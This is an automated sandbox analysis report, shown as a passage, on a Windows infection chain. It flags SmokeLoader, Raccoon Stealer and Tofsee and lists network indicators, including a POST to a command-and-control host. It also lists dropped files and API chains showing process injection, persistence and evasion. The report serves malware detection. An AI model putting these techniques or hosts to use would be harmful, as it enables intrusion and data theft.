Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"Google Earth","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"Google Talk","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"IBMJava*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-j

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lkoyuevdx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: host-data-coin-11.com

Source: unknown	HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49878 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49896 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49947 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 11.2.uufaeea.4615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.E666.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.U3E7zMaux2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.E666.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.E666.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.U3E7zMaux2.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.U3E7zMaux2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.1.E666.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.U3E7zMaux2.exe.5315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.U3E7zMaux2.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.E666.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.uufaeea.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.E666.exe.5415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.U3E7zMaux2.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.uufaeea.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.784101177.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.700489251.00000000044E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.713149753.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.783879616.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.713456716.0000000002301000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.766896131.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.766831607.00000000004F0000.00000004.00000001.sdmp, type: MEMORY

Source: 86C4.exe, 00000015.00000002.803047827.00000000007FA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 43.2.7801.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.7801.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.3.7801.exe.4e00000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.3.7801.exe.4e00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002B.00000003.856737411.0000000004E00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.922477314.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7801.exe PID: 7032, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands:

Yara detected Tofsee

Show sources

Source: Yara match	File source: 21.2.86C4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.lagavljy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.86C4.exe.540e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.lagavljy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.lagavljy.exe.650000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.lagavljy.exe.650000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.lagavljy.exe.490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.svchost.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.86C4.exe.560000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.86C4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.lagavljy.exe.470e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.797378726.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.807575070.0000000000650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.780018628.0000000000560000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.803811514.0000000000490000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 86C4.exe PID: 1368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lagavljy.exe PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5940, type: MEMORYSTR

System Summary:

PE file has nameless sections

Show sources

Source: ACEF.exe.7.dr	Static PE information: section name:
Source: ACEF.exe.7.dr	Static PE information: section name:
Source: ACEF.exe.7.dr	Static PE information: section name:
Source: ACEF.exe.7.dr	Static PE information: section name:
Source: ACEF.exe.7.dr	Static PE information: section name:
Source: ACEF.exe.7.dr	Static PE information: section name:

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5756 -ip 5756

Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 0_2_004100FB	0_2_004100FB
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 0_2_00411D61	0_2_00411D61
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 0_2_00411125	0_2_00411125
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 0_2_00411669	0_2_00411669
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 0_2_004046DE	0_2_004046DE
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 0_2_00410BE1	0_2_00410BE1
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 0_2_00412BF3	0_2_00412BF3
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 0_2_00533253	0_2_00533253
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 0_2_005331FF	0_2_005331FF
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_2_00402A5F	1_2_00402A5F
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_2_00402AB3	1_2_00402AB3
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_1_00402A5F	1_1_00402A5F
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_1_00402AB3	1_1_00402AB3
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_2_00402A5F	12_2_00402A5F
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_2_00402AB3	12_2_00402AB3
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_1_00402A5F	12_1_00402A5F
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_1_00402B2E	12_1_00402B2E
Source: C:\Users\user\AppData\Local\Temp\D984.exe	Code function: 14_2_004027CA	14_2_004027CA
Source: C:\Users\user\AppData\Local\Temp\D984.exe	Code function: 14_2_00401FF1	14_2_00401FF1
Source: C:\Users\user\AppData\Local\Temp\D984.exe	Code function: 14_2_0040158E	14_2_0040158E
Source: C:\Users\user\AppData\Local\Temp\D984.exe	Code function: 14_2_004015A6	14_2_004015A6
Source: C:\Users\user\AppData\Local\Temp\D984.exe	Code function: 14_2_004015BC	14_2_004015BC
Source: C:\Users\user\AppData\Local\Temp\D984.exe	Code function: 14_2_00411065	14_2_00411065
Source: C:\Users\user\AppData\Local\Temp\D984.exe	Code function: 14_2_00412A02	14_2_00412A02
Source: C:\Users\user\AppData\Local\Temp\D984.exe	Code function: 14_2_0040CAC5	14_2_0040CAC5
Source: C:\Users\user\AppData\Local\Temp\D984.exe	Code function: 14_2_00410B21	14_2_00410B21
Source: C:\Users\user\AppData\Local\Temp\D984.exe	Code function: 14_2_004115A9	14_2_004115A9
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Code function: 19_2_00402A5F	19_2_00402A5F
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Code function: 19_2_00402AB3	19_2_00402AB3
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_00410800	20_2_00410800
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_00411280	20_2_00411280
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_004103F0	20_2_004103F0
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_004109F0	20_2_004109F0
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Code function: 21_2_0040C913	21_2_0040C913
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Code function: 22_2_031996F0	22_2_031996F0
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Code function: 22_2_03190470	22_2_03190470
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Code function: 22_2_03190462	22_2_03190462
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Code function: 22_2_032CDE18	22_2_032CDE18
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Code function: 22_2_032C8658	22_2_032C8658
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Code function: 22_2_032C8DE8	22_2_032C8DE8
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Code function: 22_2_032C8DF8	22_2_032C8DF8
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Code function: 36_2_0040C913	36_2_0040C913
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 39_2_0032C913	39_2_0032C913
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Code function: 43_2_03009E20	43_2_03009E20
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Code function: 43_2_03009040	43_2_03009040

Source: C:\Users\user\AppData\Local\Temp\86C4.exe

Code function: 21_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,VirtualAlloc,

21_2_00401280

Source: U3E7zMaux2.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: U3E7zMaux2.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: U3E7zMaux2.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: U3E7zMaux2.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8ED5.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8ED5.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8ED5.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8ED5.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: D984.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: D984.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: D984.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: E666.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: E666.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: E666.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: E666.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7CA1.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7CA1.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7CA1.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7CA1.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 86C4.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 86C4.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 86C4.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 86C4.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: B58B.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: B58B.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: B58B.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7801.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7801.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7801.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: BEB3.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: uufaeea.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: uufaeea.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: uufaeea.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: uufaeea.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: lagavljy.exe.21.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: lagavljy.exe.21.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: lagavljy.exe.21.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: lagavljy.exe.21.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\AppData\Local\Temp\8EC4.exe

Section loaded: mscorjit.dll

Jump to behavior

Source: U3E7zMaux2.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows\SysWOW64\shayesoq\

Jump to behavior

Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: String function: 00404CA4 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Code function: String function: 03000550 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Code function: String function: 0040EE2A appears 40 times
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Code function: String function: 00402544 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: String function: 004048D0 appears 460 times

Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 0_2_00530110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,	0_2_00530110
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_2_00401962 Sleep,NtTerminateProcess,	1_2_00401962
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_2_0040196D Sleep,NtTerminateProcess,	1_2_0040196D
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	1_2_00402000
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,	1_2_0040250A
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_2_00401A0B NtTerminateProcess,	1_2_00401A0B
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	1_2_0040201A
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	1_2_0040201E
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	1_2_0040202D
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,	1_2_00402084
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_2_00402491 NtOpenKey,	1_2_00402491
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	1_1_00402000
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,	1_1_0040250A
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	1_1_0040201A
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	1_1_0040201E
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	1_1_0040202D
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,	1_1_00402084
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_1_00402491 NtOpenKey,	1_1_00402491
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_2_00401962 Sleep,NtTerminateProcess,	12_2_00401962
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_2_0040196D Sleep,NtTerminateProcess,	12_2_0040196D
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	12_2_00402000
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,	12_2_0040250A
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_2_00401A0B NtTerminateProcess,	12_2_00401A0B
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	12_2_0040201A
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	12_2_0040201E
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	12_2_0040202D
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_2_00402084 LocalAlloc,NtQuerySystemInformation,	12_2_00402084
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_2_00402491 NtOpenKey,	12_2_00402491
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	12_1_00402000
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,	12_1_0040250A
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	12_1_0040201A
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	12_1_0040201E
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	12_1_0040202D
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_1_00402084 LocalAlloc,NtQuerySystemInformation,	12_1_00402084
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_1_00402491 NtOpenKey,	12_1_00402491
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Code function: 19_2_00401962 Sleep,NtTerminateProcess,	19_2_00401962
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Code function: 19_2_0040196D Sleep,NtTerminateProcess,	19_2_0040196D
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Code function: 19_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	19_2_00402000
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Code function: 19_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,	19_2_0040250A
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Code function: 19_2_00401A0B NtTerminateProcess,	19_2_00401A0B
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Code function: 19_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	19_2_0040201A
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Code function: 19_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	19_2_0040201E
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Code function: 19_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,	19_2_0040202D
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Code function: 19_2_00402084 LocalAlloc,NtQuerySystemInformation,	19_2_00402084
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Code function: 19_2_00402491 NtOpenKey,	19_2_00402491
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Code function: 22_2_0599F5C0 NtUnmapViewOfSection,	22_2_0599F5C0
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Code function: 22_2_0599F6A0 NtAllocateVirtualMemory,	22_2_0599F6A0

Source: C:\Users\user\AppData\Local\Temp\86C4.exe

Code function: 21_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,

21_2_00408E26

Source: U3E7zMaux2.exe	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: D984.exe.7.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: E666.exe.7.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 7CA1.exe.7.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 86C4.exe.7.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: B58B.exe.7.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 7801.exe.7.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: uufaeea.7.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: lagavljy.exe.21.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: ACEF.exe.7.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: 9A02.exe.7.dr	Static PE information: Section: .rsrc ZLIB complexity 0.997770524618
Source: ACEF.exe.7.dr	Static PE information: Section: ZLIB complexity 1.00044194799
Source: ACEF.exe.7.dr	Static PE information: Section: ZLIB complexity 1.00537109375
Source: BEB3.exe.7.dr	Static PE information: Section: .didata ZLIB complexity 0.999523355577
Source: CC60.exe.7.dr	Static PE information: Section: .rsrc ZLIB complexity 0.996134750716

Source: U3E7zMaux2.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\uufaeea

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@60/50@96/18

Source: C:\Users\user\AppData\Local\Temp\86C4.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Code function: 21_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,	21_2_00409A6B
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Code function: 36_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,	36_2_00409A6B
